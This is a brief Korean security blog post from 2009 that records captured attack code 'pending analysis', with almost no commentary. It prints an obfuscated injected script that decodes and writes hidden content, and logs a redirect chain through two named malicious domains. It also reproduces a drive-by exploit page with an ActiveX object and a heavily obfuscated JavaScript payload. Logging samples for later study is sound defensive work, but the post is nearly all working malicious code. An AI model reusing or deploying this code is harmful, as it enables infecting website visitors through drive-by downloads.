본문 바로가기
정보보호 (Security)

공격 코드 분석 대기 등록

by 날으는물고기 2009. 4. 7.

공격 코드 분석 대기 등록

소스 삽입 코드

<script>function c32aee72b6q49cd039646b4c(q49cd0396471d2){ var q49cd03964799d=16; return (eval('pa'+'rseInt')(q49cd0396471d2,q49cd03964799d));}function q49cd03964893e(q49cd039649299){ var q49cd03964a87a=2; var q49cd0396498de='';q49cd03964b821=String['fromCharCode'];for(q49cd03964a0ad=0;q49cd03964a0ad<q49cd039649299.length;q49cd03964a0ad+=q49cd03964a87a){ q49cd0396498de+=(q49cd03964b821(c32aee72b6q49cd039646b4c(q49cd039649299.substr(q49cd03964a0ad,q49cd03964a87a))));}return q49cd0396498de;} var v39='';var q49cd03964bfec='3C7'+v39+'3637'+v39+'2697'+v39+'07'+v39+'43E696628216D7'+v39+'96961297'+v39+'B646F637'+v39+'56D656E7'+v39+'42E7'+v39+'7'+v39+'7'+v39+'2697'+v39+'465287'+v39+'56E657'+v39+'363617'+v39+'065282027'+v39+'2533632536392536362537'+v39+'322536312536642536352532302536652536312536642536352533642536332533332533322532302537'+v39+'332537'+v39+'32253633253364253237'+v39+'2536382537'+v39+'342537'+v39+'342537'+v39+'302533612532662532662536332536632536312537'+v39+'322536312536362536392536652532652536392536652536362536662532662537'+v39+'342537'+v39+'322536312536362536362532662536392536652536342536352537'+v39+'382532652537'+v39+'302536382537'+v39+'30253366253237'+v39+'2532622534642536312537'+v39+'342536382532652537'+v39+'322536662537'+v39+'352536652536342532382534642536312537'+v39+'342536382532652537'+v39+'32253631253665253634253666253664253238253239253261253331253335253337'+v39+'253332253239253262253237'+v39+'253632253337'+v39+'253339253634253336253334253336253633253336253339253237'+v39+'2532302537'+v39+'37'+v39+'2536392536342537'+v39+'34253638253364253335253332253334253230253638253635253639253637'+v39+'2536382537'+v39+'342533642533332532302537'+v39+'332537'+v39+'342537'+v39+'39253663253635253364253237'+v39+'2537'+v39+'362536392537'+v39+'332536392536322536392536632536392537'+v39+'342537'+v39+'39253361253638253639253634253634253635253665253237'+v39+'2533652533632532662536392536362537'+v39+'3225363125366425363525336527'+v39+'29293B7'+v39+'D7'+v39+'6617'+v39+'2206D7'+v39+'969613D7'+v39+'47'+v39+'27'+v39+'5653B3C2F7'+v39+'3637'+v39+'2697'+v39+'07'+v39+'43E';document.write(q49cd03964893e(q49cd03964bfec));</script>

GET http://clarafin.info/traff/index.php? HTTP/1.1

Redirect : http://letomerin.cn/x0/index.php

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<META http-equiv=Content-Type content="text/html; charset=windows-1251">
</HEAD>
<BODY><object id=xmltarget classid="CLSID:88d969c5-f192-11d4-a65f-0040963251e5"></object><div id="pdfplace"></div><div id="xmlplace"></div><script language=JavaScript>function ddd(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(72,0,65,0,5,60,0,0,0,0,42,0,61,23,0,22,66,64,44,48,0,27,51,38,21,0,0,0,0,0,0,47,13,32,63,10,11,40,9,56,33,54,12,1,70,26,15,4,3,2,19,17,69,37,36,58,29,7,0,0,0,6,18,0,50,53,24,14,41,30,68,67,8,20,34,16,25,35,43,49,28,57,39,62,59,55,45,46,71,52,0,0,0,31,0);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-33])<<s;if(s){r+=String.fromCharCode(26^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}ddd("8W0fFAsNxTa%l4v6zVs679ZYXiJYJG7KIYLP3wZNXW8qCmsYr9s~CYa6z-.NrwsNCGQdC&8EeH_DC&8EeH_DC&8D&-ZfC&0De&RfC&^E3WviC&8i+BviC&8i+FaDC&J~&V_DHFSK.5LdC&J~FH_DC&J~HpvfC&J~kFaEC&^~&-.fC&^~&pZ~C&8iHbR~C&8~&ra~C&J~&-Z~C&^Ex&Z~C&J~e3Z~C&Ji&pkEC&8EF4.DC&Ji&pkEC&^EC-.EC&J~&e_DC&J~&-ZfHFSK.5LdC&^Ex&Z~C&^fnF_DC&^Eoi_EC&J~o3vDC&8DwF_DC&J~&waDC&J~&-Z~C&JfupREC&^fn&ZfC&0Ewi_EC&^E@3aDC&8Dw&vDC&J~&wR~C&J~&-Z~C&JfupREC&^fn&.EHFSK.5LdC&0fuG_EC&JD+&R~C&8DwBk~C&J~&ek~C&J~&-Z~C&JfupREC&^fn&.DC&8D+i_EC&8D&IaDC&8DwiR~C&J~&VRfC&J~&-Z~C&JfupREC&^fn4Z~C&^DCG_EC&8DuAREHFSK.5LdC&8Dw&_EC&J~&IaiC&J~&-Z~C&JfupREC&Jf&pZfC&8~w4R~C&JiuI_fC&^E33aEC&^~w3vfC&J~kFREC&J~&-v~C&^fo&Z~C&JiupREC&^ExWZfC&J~HwvfC&J~CGaEHFSK.5LdC&^ExBZEC&^~wBvfC&8DwBviC&J~&pkEC&J~&-Z~C&8iwBZ~C&^~@HviC&Ji&VsDC&0EkF_EC&J~&-Z~C&^E3&Z~C&^~e3vfC&^DupkEC&^D&p_fC&^E3BZ~C&0f&wvfHFSK.5LdC&JD+i_EC&J~&-Z~C&^f&-Z~C&JfupkEC&8i@4ZfC&^f3&s~C&^fupkEC&8Dw4.EC&J~&Ga~C&J~&-Z~C&Jfu-.fC&^DkWZ~C&^fe&Z~C&0foKaDC&^DkiafC&J~HwZ~HFSK.5LdC&8iuA_EC&J~&-Z~C&JiuwkDC&^ExWZ~C&J~e3vfC&J~CGaEC&^ExBZEC&^~wBvfC&Jf&e_EC&J~&-Z~C&8i@&Z~C&^fw&siC&Jfu-.fC&8~rVZfC&^frVkEC&JD+B.fHFSK.5LdC&0f&AafC&^frIZ~C&JfupkEC&8i@4.DC&^f3&vfC&^fupkEC&8Dw4.EC&J~&V.fC&J~&-Z~C&J~&GaEC&JiuwkDC&^ExWZ~C&J~w3vfC&J~tGaEC&^ExBZEC&^~wBvfHFSK.5LdC&^~&e_EC&J~&-Z~C&8i@&Z~C&^Ex3kDC&^~&wvfC&J~CGaEC&^ExBZEC&^~wBvfC&J~&e_EC&J~&-Z~C&JfC-Z~C&^ftIsEC&8DC-.fC&8DC-.fC&8DC-.fC&8DC-.fHFSK.5LdC&8De4_fC&^f@&ZfC&^ExB.fC&8DtVaEC&^ftwkiC&8D&wkDC&^ExBvfC&^ExF_DC&J~wKRDC&^fF4kEC&^fn&.DC&JirpkEC&^ExH.DC&^~oKRfC&J~rA_EC&^fn3_fHFSK.5LdC&Jin4kEC&J~rVZ~C&8~rw_fC&Jf3BREC&8EF3v~C&^Dr-.fC&8~rIviC&J~+3aiC&^~&-aDC&JDtrvEC&J~wKRfC&^DoBa~C&J~r-ZDC&Jf&wk~C&JDCekEC&JDoHsEHFSK.5LdC&JiuIvDC&^f@FafC&8Dx4kEC&^f@4kEC&J~rVZfC&8inWRDC&J~e4kEC&^Ex3sEC&^~eBvEC&0DF&.fC&J~HpkEC&J~rpkEC&^foBafC&^DtIZDC&J~&-.EC&JDHe_EHFSK.5LdC&JD+3aDC&^fuwkDC&JfeBs~C&Jf+3ZDC&J~&wvDC&0Ex4kiC&0E+zkEC&^DqVa0C&^EmIR.C&0Ex4aEC&^EfpR.C&0EF4aEC&^E~paiC&^EeBa.C&^Dqpa.C&0D+zkiC&^E@BR.C&^E@zkiC&0E+Ba.C&0E+4kiHKSi.5L6uI8dee^NuA8dsF76z-.NrwsNCGQdC&8DueafC&8DueafHKSi.5I~beScXW8NFwvcXP7GXW8NFwvcIF7mXz8q7mv~aW8NFwvczcv~zbs6aenGXFkctekD+FaKIqLPv-vYbIJcXqkdz-.6X3%NFwvcaKSi.5L~bI8K7e7GXF_iXKsd8F7D+F_iXK.KpKScXqv~v9ZNn%zqZe7GXW8NFwvcXPndeGv~Jm.fbrv~IF7m.5I~bVv6v-ZYxTS~CrJ.J-vYCTs6cAJjtGQdkYsY+mvfr-Zd7l7qzTv~FGVS.mVdsFQd8iz90e7jfYajWcklWc_0WcadLVV.6rz0Lmaqvw.~CeS_iVbGar86+L_Ab4Sdkeaf+3.i&Wnc+3sDu%RACGJfve8YCTSfbYZGZYPG8jS0Wc_ARTkGbiz90TkGGez0jen.6rz0GIj0sW7jXHb0dw%.0rbGmen.6rz0q9%_.wVS6VzG_rz90TkGRYV9XKV.sK%G8jnl.m%G8WW_6TVdfwVS6VP_mY_dSen.6rz0qmV.sWVdfwVS6p99iYb0dw9_siVS.m%G8jS_Dw%9Wc_AGez0jTRdIqLPe-s6dAvYC9v6xGQdeTsK7BnAXWkD+KSi.5pm.5L~@T.fxA.YzenNtpsK7PJ%lH^NneSc.5L6uI8dbIZqXqkdz-8YJ%a%ljZf4e7GXlv~we70rrJq3-sl9IZqCVs6aB70rI0YDr%.zFW.qI7KIqLP7psda3SYHLvKXP0YHLsdsFQYCb8d6Vs67pJ~R9%f4-.fxGQdDr%.zFW~&VV6FmZd7Pam.5pq&enKbIZq7FSct9.f@Yv~zr^A--s6~mv~v-ZYxIbcSrsKHF8~&e8YuVv~HKQA7TZYCI8jdYV9XqkdHca~vIv~teS67rs6aY_Oo&kD-FnqCA.~arJG-3aE+zndeI0fszSN+m.A+rZ~zF8~&bndxA8NCY_Oue8NJA.furJqbT.A+rZ~-lkGb&vYH-s~WBSisYLPseSfur0faG7~7FSc.5I~bVv6v-ZYxTS~CrJ.J-vYCTs6cAJjtGQd+rZ~+mvfr-Zd7l7qzTv~FGVS.mVdsFQd8&vYH-s~XzJqtr8qsz7D@F_OXiv~7bsqxY_Oo&kD-FSNFVvG-W8NJ9nNtpZA+rZ~-Fn6neJ~sz7f+e8Y7VvfxA.Yz9nNtp.OWc_ACYZfCrZGHPa%lqJ%lWJ~xrzqv-.Y@r8KHiJYJG7KHcndoFkD7Pa%lqJ%l4v6zVs679ZYXW^YaKSc.5I6FA0c.5LNCrJGz-.6X39fxAZ6CGj9HLv~rr8KHW^Y+p06zWPYue0Na9s6X4zqCbJ~FeS0bTs6F9sYz3Rd7Pa%l4JfFe7fFIvqxIJfFA0T&AsYCe7GXznqxr8NBjSAJ-s6bYv~FAZYzWZYbi8Db&scCTnNae0OIqLP3wZNXHv~er8dsFSOmL_ADI0Y-IJfveQ.7mv~e9S9@r8Yb9.qX&Vc+IJ~eV0AwwZfz&scCbSi.5I~bVv6v-ZYxTS6FAs6CGQd8jZf4-.fxeSfJw.NeAs~szSfJVJqtLR.+&VEFH%E+qSD3i_0v3aDfeaA6rVioqnD+3VDmAkDfVVifA_OXKs~sz7fxrJfr%.OWc_AbIZqCVs6WB7KIqLPur86uV.qzWPYue0Na9s6Dws6ae7GX3ZNHAs6FwZNn9P~7mv~IqLPe-s6dAvYC9v6xGSOwAZYt9.6zc.Yrws679ZYXqkdHcs~ue^ibjQd-cSD+FkD7Pa%l3s6xw.fpTS0bYsNF-.Ne-s~Dws6ae7GXHv~er0i.5pfxrJfr%ZADIJqzr0_zwsNeG.YxG7fFIvqxIJfFA0T&AsYCmn~CV867Pa%lq0fur0faG7~7PJm.5pm.5INtpsK7Pa%lc_AeVZN7e86WqLP")</script>

ActiveX 설치 및 바이러스 탐지

차후 분석~
728x90

댓글